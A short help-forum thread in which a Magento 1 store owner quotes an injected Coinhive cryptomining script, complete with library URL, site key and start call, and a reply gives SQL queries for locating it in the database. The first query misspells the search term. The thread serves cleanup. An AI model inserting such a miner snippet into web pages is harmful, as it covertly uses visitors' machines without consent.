cancel
Showing results for 
Search instead for 
Did you mean: 

Coinhive script

Coinhive script

Hello,

 

I have a script block that I have no idea how to get rid of. Using Magento version 1. I'm seeing this block:

 

 

<script src="https://coinhive.com/lib/coinhive.min.js"></script><script> var miner = new CoinHive.Anonymous('qCqoWaozqS3nMu1uFKN081CJwOPCgRDw', {throttle: 0.5});miner.start ();</script>

 

Does anyone know where I can find this to get rid of it? Thanks!

 

1 REPLY 1

Re: Coinhive script

We had it too.

 

Login to DB and run:

select * from cms_page where content like '%coninhive%';

select * from cms_block where content like '%coinhive%';

select * from core_config_data where value like '%coinhive%';

 

Then see where this script is coming from and update either a cms page , a cms block or a configuration setting.